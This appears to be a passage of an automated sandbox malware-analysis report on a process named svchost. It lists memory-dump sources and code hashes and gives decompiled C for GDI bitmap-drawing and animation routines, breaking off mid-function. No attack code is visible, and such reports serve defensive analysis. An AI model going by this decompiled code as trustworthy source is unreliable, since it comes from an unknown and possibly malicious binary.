    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 33a23ec732da9fb40a185b4eed5ece97a349a83c6d80b035494cbc5c0868b739
    • Instruction ID: 5176edb1852c9b0e96117814e5b528a86063aae7024c4964ec079eb19fdda6c2
    • Opcode Fuzzy Hash: 33a23ec732da9fb40a185b4eed5ece97a349a83c6d80b035494cbc5c0868b739
    • Instruction Fuzzy Hash: FB1250B16087018FCB18CF19D99062BBBE6EBC9304F15896EE889CB345E774DC45CB96
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 53b3f88cdecfd161848c40ac68c254e1f7cff70da81a5f5c78c40c135ae89574
    • Instruction ID: 9656f85adc961465b66369f0cb2b6a2eff9fb191086158373f291d78b2580c46
    • Opcode Fuzzy Hash: 53b3f88cdecfd161848c40ac68c254e1f7cff70da81a5f5c78c40c135ae89574
    • Instruction Fuzzy Hash: 3EC1322560A6924FDB198A6C94E92BBBFD1DB6B311B0881FFDDC5CB323C565840EC354
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: bd7d6e5bdf9180fc249a7cdffd82ac3d4432134ef2b1545fd9ebd85a9bab015f
    • Instruction ID: 3b5ab67c06262ad7a101bc49bce7f6c055a9774a757496cf9847425f6274602e
    • Opcode Fuzzy Hash: bd7d6e5bdf9180fc249a7cdffd82ac3d4432134ef2b1545fd9ebd85a9bab015f
    • Instruction Fuzzy Hash: 8DD1C66150D6D24BD722CE2885A03A6FFD1AFA7305F188ADFD8C44F343D2A6990DC356
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: dcdb0e9a48f9cc5b8454a5ea312c92bd26660b050e477f45892fe8a81102f325
    • Instruction ID: af08ebb05414776d5e53561ee3afdc267b35584e06cebba72db5f7bc146b2750
    • Opcode Fuzzy Hash: dcdb0e9a48f9cc5b8454a5ea312c92bd26660b050e477f45892fe8a81102f325
    • Instruction Fuzzy Hash: AAD1B43560D7828FC325CF29C4912A7FBE1EF9A304F48856DE8D99B752D234D80ACB55
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7c84515c638c63e4fe69de43caeaa1b4b7f9488a9b0e7ec9114424ae6e0b3906
    • Instruction ID: d03c98dc8f4421056e21e36197df4e44f6003633d23668913cdfc5373a703850
    • Opcode Fuzzy Hash: 7c84515c638c63e4fe69de43caeaa1b4b7f9488a9b0e7ec9114424ae6e0b3906
    • Instruction Fuzzy Hash: 57D12675204B418FD724CF29C980AA7B7E5FF89308B18492ED8D687B51EB39F846CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e0a63bb2cad0d03da99ae37a7cafd4555ab2635092ef7e12ae5d440ffd4bb82f
    • Instruction ID: 09a4d2990106f6263b19ee0bb5d8e8ede74ff95f82281fbe411837f67485b090
    • Opcode Fuzzy Hash: e0a63bb2cad0d03da99ae37a7cafd4555ab2635092ef7e12ae5d440ffd4bb82f
    • Instruction Fuzzy Hash: 7DD12675200B418FD324CF29C980AA7B7E6FF89304B18892ED8D687B52DB35F849CB44
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 44dc9b3f848b861922e0aa16c27fab3ea16433a1379b6acb80e44ff1c9d73b6c
    • Instruction ID: a4d976059cbdf699ac0c90c8ff984a592dc19429bf2528d4fd2d5d3f93817af3
    • Opcode Fuzzy Hash: 44dc9b3f848b861922e0aa16c27fab3ea16433a1379b6acb80e44ff1c9d73b6c
    • Instruction Fuzzy Hash: 4F91B5723406082FE728A9358C13B7F7689EBC1729F05072EBA179B7C5EEF55D009299
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: b2965fc247305cd2ece6cae1d1fda286a7e39d6dca32de6f99f8716fad9cec42
    • Instruction ID: 602264276ce6c193c07cd1559a885979b3f0fc61da0ba959e6f72f7937ccad52
    • Opcode Fuzzy Hash: b2965fc247305cd2ece6cae1d1fda286a7e39d6dca32de6f99f8716fad9cec42
    • Instruction Fuzzy Hash: 6AD18C756082518FC319CF18E5D88E27BE1BFA8740F0E42F9C98A9B323D7359845CB99
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2037103b63b13f374ae70047d9bf04f5863922b68f59a88a5ea815b066336b43
    • Instruction ID: 13ea316f9a527aae2baa99fe1942b333eb2132d837011ab3f65d46d27d453c23
    • Opcode Fuzzy Hash: 2037103b63b13f374ae70047d9bf04f5863922b68f59a88a5ea815b066336b43
    • Instruction Fuzzy Hash: 0CB13675214B418FC728CF29C9909A7B7E6BF89304B18892ED9CBC7B41EA35F841CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: e54d4280d6d24488f2fe33cbcb8ed73f51912273aa230d8a818fea9767846e4a
    • Instruction ID: 5e0bac26d044b1c655d9d97a2020f1100cfede7809a0616145335ef2943ade47
    • Opcode Fuzzy Hash: e54d4280d6d24488f2fe33cbcb8ed73f51912273aa230d8a818fea9767846e4a
    • Instruction Fuzzy Hash: E0B12875214B418FD324CF29C9909A7B7E6FF89304B18892ED8CAC7B52EA35F845CB45
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
    • Instruction ID: 6684b9928b0fe307c68ecd6e01e57e79f1d1d1f2c7bc057325a7fa750ed7be03
    • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
    • Instruction Fuzzy Hash: 95B16A7590024A9FDB25CF04C5D0AE9BBA1FF58318F24C5AED81A5B382C735EE56CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cab88bb81d6f1a3f294bb195b69a7ed404116198194961875d31482ad394f9ff
    • Instruction ID: dc08eaf4c9dd8d12cf9d7bb60e589f22d2088e1931f430fe34c9c0932c55a375
    • Opcode Fuzzy Hash: cab88bb81d6f1a3f294bb195b69a7ed404116198194961875d31482ad394f9ff
    • Instruction Fuzzy Hash: 92A1F875A087458FC318CF2AC49085AFBF2BFC8714F198A6DE99987325E770E945CB42
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4664e54bd8655df0b62760be2564d86677a0bae60cff444b8354291ceb51d8c8
    • Instruction ID: 7d3e1dda63703d45c9bc654ed2dbd2ba781d7d0bef69021af019c93a0f46c373
    • Opcode Fuzzy Hash: 4664e54bd8655df0b62760be2564d86677a0bae60cff444b8354291ceb51d8c8
    • Instruction Fuzzy Hash: A171D43550C6868BCB15CF288484266FFD2ABAB305F0CC69FC8C89B357D666E90DC791
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: cb3e68b2ccd2825e438886f05605c2f02178f8c24b0d15ad71760b3e7943db68
    • Instruction ID: 77a53f408c153f164d4fd17299ac71b4593e799f6ffc4d925031456c84ff7ad8
    • Opcode Fuzzy Hash: cb3e68b2ccd2825e438886f05605c2f02178f8c24b0d15ad71760b3e7943db68
    • Instruction Fuzzy Hash: 4C5115352087544FC305CE2D989016AFBD29BCA316F1C8A6EDDD9C7713E63598098B85
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
    • Instruction ID: 09baefc498b6dd2edd2355ba8bb0320d1148eb3c0ee7ecda0380399fb878f2da
    • Opcode Fuzzy Hash: 0b4f27dd10139f30faea009d98bf7d04ad43b169fe1efa635cf320682f8d45aa
    • Instruction Fuzzy Hash: C2313033B4598203F71DCA2F8CA12FAEAD34FC521871DD47E99C58B356ECB984174144
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0043A9F0(void* __ecx, void* __fp0) {
    				struct HDC__* _v36;
    				long _v40;
    				signed int _v56;
    				void* _v60;
    				long _v68;
    				int _v88;
    				int _v92;
    				struct HDC__* _v96;
    				void* _v100;
    				void* _v104;
    				void* _v108;
    				int _v112;
    				struct HDC__* _v120;
    				void* _v124;
    				struct HDC__* _v128;
    				int _v136;
    				int _v140;
    				void* _v144;
    				void* _v148;
    				struct HDC__* _v152;
    				signed int _v156;
    				struct HDC__* _v160;
    				void* _v164;
    				void* _v176;
    				struct HDC__* _v180;
    				void* _v208;
    				void* _v212;
    				struct HBITMAP__* _v228;
    				struct HDC__* _v232;
    				struct HBITMAP__* _v244;
    				void* _v248;
    				void* _v252;
    				void* _v256;
    				void* _v260;
    				void* _v264;
    				long _v268;
    				long _v304;
    				struct HDC__* _v384;
    				struct HDC__* _v456;
    				void* _v460;
    				void* _v464;
    				struct HDC__* _v480;
    				void* __ebp;
    				long _t162;
    				int _t166;
    				void* _t174;
    				signed int _t179;
    				void* _t181;
    				void* _t197;
    				void* _t239;
    				struct HDC__* _t255;
    				signed int _t264;
    				int _t273;
    				struct HDC__* _t325;
    				struct HDC__* _t327;
    				void* _t329;
    				struct HDC__* _t333;
    				struct HDC__* _t336;
    				struct HDC__* _t340;
    				void* _t363;
    
    				_t363 = __fp0;
    				_push(0xffffffff);
    				_push(E004901D8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t340;
    				_t329 = __ecx;
    				_t325 = GetDC( *(__ecx + 0x1c));
    				_v36 = _t325;
    				SetStretchBltMode(_t325, E004204B0());
    				_t255 = CreateCompatibleDC(_t325);
    				_t333 = CreateCompatibleDC(_t325);
    				 *(_t329 + 0xa4) = _t325;
    				_v96 = _t333;
    				_v88 = 0;
    				if( *(_t329 + 0xc4) == 0) {
    					L2:
    					 *(_t329 + 0xc4) = 1;
    					if( *(_t329 + 0xc0) == 0) {
    						_t239 = CreateCompatibleBitmap(_t325,  *(_t329 + 0xd4),  *(_t329 + 0xd8));
    						 *(_t329 + 0xc0) = _t239;
    						_v104 = SelectObject(_t333, _t239);
    						_push( *((intOrPtr*)(_t329 + 0xdc)));
    						E00489F7B( &_v56);
    						asm("sbb eax, eax");
    						_v100 = SelectObject(_v120,  ~( &_v60) & _v56);
    						PatBlt(_v128, 0, 0,  *(_t329 + 0xd4),  *(_t329 + 0xd8), 0xf00021);
    						SelectObject(_v152, _v124);
    						SelectObject(_v160, _v148);
    						_v108 = 0x497844;
    						_t28 =  &_v108; // 0x497844
    						_v92 = 0;
    						E00489F15(_t28);
    						_v92 = 0xffffffff;
    					}
    					 *(_t329 + 0xc4) = 0;
    					 *(_t329 + 0x84) = 4;
    					if( *((intOrPtr*)(_t329 + 0xbc)) == 1) {
    						L34:
    						DeleteDC(_t255);
    						DeleteDC(_v100);
    						ReleaseDC( *(_t329 + 0x1c), _t325);
    						 *((intOrPtr*)(_t329 + 0xbc)) = 2;
    						 *[fs:0x0] = _v36;
    						return 1;
    					} else {
    						do {
    							_t162 = GetTickCount();
    							_v40 = _t162;
    							_v68 = _t162;
    							if( *(_t329 + 0xc4) == 0) {
    								L8:
    								 *(_t329 + 0xc4) = 1;
    								_v92 = SelectObject(_v96,  *(_t329 + 0xc0));
    								_t166 =  *(_t329 + 0x84);
    								if(_t166 == 8 || _t166 == 0xc) {
    									_v108 = SelectObject(_t255, _v96);
    									BitBlt(_v112,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
    									SelectObject(_t255, _v144);
    									DeleteObject(_v148);
    									_v152 = 0;
    								}
    								 *(_t329 + 0x84) = 0;
    								_t174 = E0043B1D0();
    								_v144 = _t174;
    								if(_t174 != 0) {
    									_t273 =  *(_t329 + 0x84);
    									if(_t273 == 8 || _t273 == 0xc) {
    										_t197 = CreateCompatibleBitmap(_t325,  *(_t329 + 0x54),  *(_t329 + 0x58));
    										_v164 = _t197;
    										_v176 = SelectObject(_t255, _t197);
    										BitBlt(_t255, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _v180,  *(_t329 + 0x60),  *(_t329 + 0x5c), 0xcc0020);
    										SelectObject(_t255, _v212);
    										_t174 = _v208;
    									}
    									_v228 = SelectObject(_t255, _t174);
    									if( *((intOrPtr*)(_t329 + 0x88)) == 0) {
    										BitBlt(_v232,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
    									} else {
    										_t336 = CreateCompatibleDC(_t325);
    										_t327 = CreateCompatibleDC(_t325);
    										_v228 = CreateBitmap( *(_t329 + 0x54),  *(_t329 + 0x58), 1, 1, 0);
    										_v244 = CreateBitmap( *(_t329 + 0x54),  *(_t329 + 0x58), 1, 1, 0);
    										_v256 = SelectObject(_t336, _v248);
    										_v256 = SelectObject(_t327, _v252);
    										_v268 = SetBkColor(_t255,  *(_t329 + 0xa0));
    										BitBlt(_t327, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xcc0020);
    										SetBkColor(_t255, _v304);
    										BitBlt(_t336, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t327, 0, 0, 0x330008);
    										BitBlt(_v384,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t327, 0, 0, 0x8800c6);
    										BitBlt(_t255, 0, 0,  *(_t329 + 0x54),  *(_t329 + 0x58), _t336, 0, 0, 0x8800c6);
    										BitBlt(_v456,  *(_t329 + 0x60),  *(_t329 + 0x5c),  *(_t329 + 0x54),  *(_t329 + 0x58), _t255, 0, 0, 0xee0086);
    										DeleteObject(SelectObject(_t336, _v460));
    										DeleteObject(SelectObject(_t327, _v464));
    										DeleteDC(_t336);
    										DeleteDC(_t327);
    										_t325 = _v480;
    									}
    									SelectObject(_t255, _v264);
    									DeleteObject(_v260);
    								}
    								if(IsWindow( *(_t329 + 0x1c)) != 0) {
    									E0043A530(_t329, _t363,  &_v136,  &_v140,  &_v108,  &_v112);
    									_push(0xcc0020);
    									if( *((intOrPtr*)(_t329 + 0xd0)) == 0) {
    										BitBlt(_t325, _v136, _v140,  *(_t329 + 0xd4),  *(_t329 + 0xd8), _v160, 0, 0, ??);
    									} else {
    										StretchBlt(_t325, _v136, _v140, _v108, _v112, _v160, 0, 0,  *(_t329 + 0xd4),  *(_t329 + 0xd8), ??);
    									}
    								}
    								SelectObject(_v160, _v148);
    								 *(_t329 + 0xc4) = 0;
    								_t179 =  *(_t329 + 0x90);
    								if(_t179 == 0) {
    									_t264 =  *(_t329 + 0x9c);
    									_v156 = _t264;
    								} else {
    									_t264 = _t179 + _t179 * 4 << 1;
    									_v156 = _t264;
    								}
    								if( *((intOrPtr*)(_t329 + 0xbc)) == 1) {
    									break;
    								} else {
    									while(_t264 > _v140 - _v112) {
    										Sleep(0xa);
    										_v140 = GetTickCount();
    										if( *((intOrPtr*)(_t329 + 0xbc)) != 1) {
    											_t264 = _v156;
    											continue;
    										}
    										goto L31;
    									}
    									goto L31;
    								}
    							} else {
    								goto L7;
    							}
    							do {
    								L7:
    							} while ( *(_t329 + 0xc4) != 0);
    							goto L8;
    							L31:
    						} while ( *((intOrPtr*)(_t329 + 0xbc)) != 1);
    						_t181 = _v160;
    						if(_t181 != 0) {
    							DeleteObject(_t181);
    						}
    						goto L34;
    					}
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    				} while ( *(_t329 + 0xc4) != 0);
    				goto L2;
    			}

    APIs
    • GetDC.USER32(?), ref: 0043AA12
      • Part of subcall function 004204B0: EnumDisplaySettingsA.USER32(00000000,000000FF,?), ref: 004204BF
    • SetStretchBltMode.GDI32(00000000,00000000), ref: 0043AA25
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AA32
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AA37
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043AA88
    • SelectObject.GDI32(00000000,00000000), ref: 0043AA9C
    • SelectObject.GDI32(?,?), ref: 0043AAC6
    • PatBlt.GDI32(?,00000000,00000000,?,?,00F00021), ref: 0043AAE8
    • SelectObject.GDI32(?,?), ref: 0043AAF8
    • SelectObject.GDI32(?,?), ref: 0043AB04
    • GetTickCount.KERNEL32 ref: 0043AB52
    • SelectObject.GDI32(?,?), ref: 0043AB8A
    • SelectObject.GDI32(00000000,00000000), ref: 0043ABA6
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043ABCB
    • SelectObject.GDI32(00000000,?), ref: 0043ABD7
    • DeleteObject.GDI32(00000000), ref: 0043ABDE
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043AC22
    • SelectObject.GDI32(00000000,00000000), ref: 0043AC2E
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00CC0020), ref: 0043AC53
    • SelectObject.GDI32(00000000,?), ref: 0043AC5F
    • SelectObject.GDI32(00000000,?), ref: 0043AC67
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AC7C
    • CreateCompatibleDC.GDI32(00000000), ref: 0043AC85
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0043AC9B
    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0043ACB3
    • SelectObject.GDI32(00000000,?), ref: 0043ACC3
    • SelectObject.GDI32(00000000,?), ref: 0043ACD3
    • SetBkColor.GDI32(00000000,?), ref: 0043ACE5
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 0043AD06
    • SetBkColor.GDI32(00000000,?), ref: 0043AD12
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00330008), ref: 0043AD2F
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 0043AD54
    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 0043AD71
    • BitBlt.GDI32(?,?,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 0043AD96
    • SelectObject.GDI32(00000000,?), ref: 0043ADA2
    • DeleteObject.GDI32(00000000), ref: 0043ADA9
    • SelectObject.GDI32(00000000,?), ref: 0043ADB5
    • DeleteObject.GDI32(00000000), ref: 0043ADBC
    • DeleteDC.GDI32(00000000), ref: 0043ADC9
    • DeleteDC.GDI32(00000000), ref: 0043ADCC
    • SelectObject.GDI32(00000000,?), ref: 0043AE05
    • DeleteObject.GDI32(?), ref: 0043AE0C
    • IsWindow.USER32(?), ref: 0043AE16
    • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0043AE7A
    • BitBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00CC0020), ref: 0043AEA4
    • SelectObject.GDI32(?,?), ref: 0043AEB4
    • Sleep.KERNEL32(0000000A), ref: 0043AF00
    • GetTickCount.KERNEL32 ref: 0043AF06
    • DeleteObject.GDI32(00000000), ref: 0043AF33
    • DeleteDC.GDI32(00000000), ref: 0043AF40
    • DeleteDC.GDI32(?), ref: 0043AF47
    • ReleaseDC.USER32(?,00000000), ref: 0043AF4E
      • Part of subcall function 0043A530: GetClientRect.USER32(?,?), ref: 0043A557
      • Part of subcall function 0043A530: __ftol.LIBCMT ref: 0043A62E
      • Part of subcall function 0043A530: __ftol.LIBCMT ref: 0043A641
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Object$Select$Delete$Create$Compatible$Bitmap$ColorCountStretchTick__ftol$ClientDisplayEnumModeRectReleaseSettingsSleepWindow
    • String ID: DxI
    • API String ID: 1975044605-1614083780
    • Opcode ID: 1e639da4973506390d783c598d691916c05618e62b57df4c73938e63ed00b0fb
    • Instruction ID: 44bb3ddcab1ee2f4c986766a349b7a4dc77b7d798a5ae7dfa460e00b1e32f58b
    • Opcode Fuzzy Hash: 1e639da4973506390d783c598d691916c05618e62b57df4c73938e63ed00b0fb
    • Instruction Fuzzy Hash: 0D02B4B1244700AFD324DF65CD85F6BB7E9FB88B04F10492DF69693290D6B4E805CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00448760(void* __ecx, intOrPtr* _a4, int _a8) {
    				signed int _v4;
    				intOrPtr _v8;
    				intOrPtr _v12;
    				int _v20;
    				signed int _v24;
    				struct tagRECT _v40;
    				char _v44;
    				int _v48;
    				int _v52;
    				struct tagRECT _v68;
    				struct tagRECT _v84;
    				char _v88;
    				char _v92;
    				struct tagRECT _v108;
    				char _v112;
    				char _v120;
    				char _v124;
    				char _v132;
    				char _v140;
    				char _v144;
    				char _v152;
    				void* __ebp;
    				void* _t159;
    				void* _t170;
    				void* _t172;
    				long _t192;
    				void* _t207;
    				void* _t215;
    				long _t226;
    				void* _t243;
    				signed int _t252;
    				long* _t255;
    				intOrPtr* _t258;
    				char* _t281;
    				int* _t310;
    				intOrPtr* _t370;
    				intOrPtr* _t371;
    				void* _t376;
    				intOrPtr _t381;
    				intOrPtr _t382;
    				intOrPtr _t396;
    
    				_push(0xffffffff);
    				_push(E004906E0);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t396;
    				_t376 = __ecx;
    				_t252 = _a8;
    				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x5c)) - 8)) == 0 || _t252 != 0xfffffffe) {
    					if( *((intOrPtr*)( *((intOrPtr*)(_t376 + 0x58)) - 8)) == 0 || _t252 != 0xfffffffd) {
    						_v88 =  &_v44;
    						_t159 = E00448170(_t376, _t252,  &_v88);
    						if(_t159 != 0) {
    							_t370 = _a4;
    							_a8 = 0;
    							if((GetDeviceCaps( *(_t370 + 8), 0x26) & 0x00000001) != 0) {
    								_v8 = E0048959D(_t370, _t376 + 0x98, 0);
    								RealizePalette( *(_t370 + 4));
    							}
    							if( *((intOrPtr*)(_t376 + 0x54)) != _t252 ||  *((intOrPtr*)(_t376 + 0x50)) == _t252) {
    								_push(GetSysColor(0xf));
    								_push( &_v52);
    							} else {
    								_push(GetSysColor(0x14));
    								_push( &_v52);
    							}
    							E0048BEC9(_t370);
    							if( *((intOrPtr*)(_t376 + 0x50)) != _t252) {
    								if( *((intOrPtr*)(_t376 + 0x54)) == _t252) {
    									DrawEdge( *(_t370 + 4),  &(_v68.bottom), 2, 0xf);
    									goto L35;
    								}
    							} else {
    								DrawEdge( *(_t370 + 4),  &(_v68.bottom), 4, 0xf);
    								L35:
    							}
